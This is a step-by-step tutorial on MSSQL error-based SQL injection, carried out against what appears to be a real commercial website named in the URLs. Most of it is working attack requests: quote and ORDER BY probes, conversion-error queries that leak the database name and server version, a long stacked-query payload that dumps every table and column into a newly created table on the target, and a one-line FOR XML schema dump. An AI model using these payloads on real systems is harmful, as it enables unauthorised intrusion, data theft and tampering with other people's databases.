⚠️MSSQL Error Based Injection

when and why to use error based SQLi: its when you are not able to get any output using Union based injection and the error is visible to you. In such case you have to use Error based Injection.

-------------------------------------------------------------

Step : 1

Putting single quote and then putting double quote checking the Error:

http://www.timescanindia.in/Product.aspx?Id=7'
ERROR

http://www.timescanindia.in/Product.aspx?Id=7"
ERROR

when both single quote and double quotes give error then apply the golden rule that the injection is integer type:

----------------------------------------------------------------

Step : 2

Now we need to know the comment type for MSSQL.

Comment	Name
--	Comment Type 1
--+	Comment Type 2
--+-	SQL Comment
/**/	Inline Comment
;%00	Null Byte

Now lets try the basic -- comment with our target:

http://www.timescanindia.in/Product.aspx?Id=7--
working fine.

http://www.timescanindia.in/Product.aspx?Id=7 order by 1--
No Error

http://www.timescanindia.in/Product.aspx?Id=7 order by 100--
Here comes the error : The ORDER BY position number 100 is out of range of the number of items in the select list

----------------------------------------------------------------

Step : 3

Now lets inject error based injection and get out output using error:

http://www.timescanindia.in/Product.aspx?Id=7 and 1=db_name()--
Boom we got the error, and yeah the output also contains database name alongwith it.
Conversion failed when converting the nvarchar value 'timescanindia' to data type int

----------------------------------------------------------------

Step : 4

Now so lets continue with it and get the version:

http://www.timescanindia.in/Product.aspx?Id=7 and @@version=1--

Again we got an error as well as the output with the error: 

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int..

Now lets play our finishing move, we'll use our ninjutsu and finish it up:

Step : 5

We have used MSSQL DIOS:

http://www.timescanindia.in/Product.aspx?Id=7;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--

Now to view the table we have created, use this query:

http://www.timescanindia.in/Product.aspx?Id=7%20and%20%28select%20output%20from%20err_dios%29=1
Again we got an error as well as the output with the error: 

Well that will do the trick for us, but other than the above there are some other ways we can do an error based injection. Like getting all the tables and columns in just one query as given below:

http://www.timescanindia.in/Product.aspx?Id=7 and 1=(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(''))--

So Here we are finished with MSSQL Error Based Injection.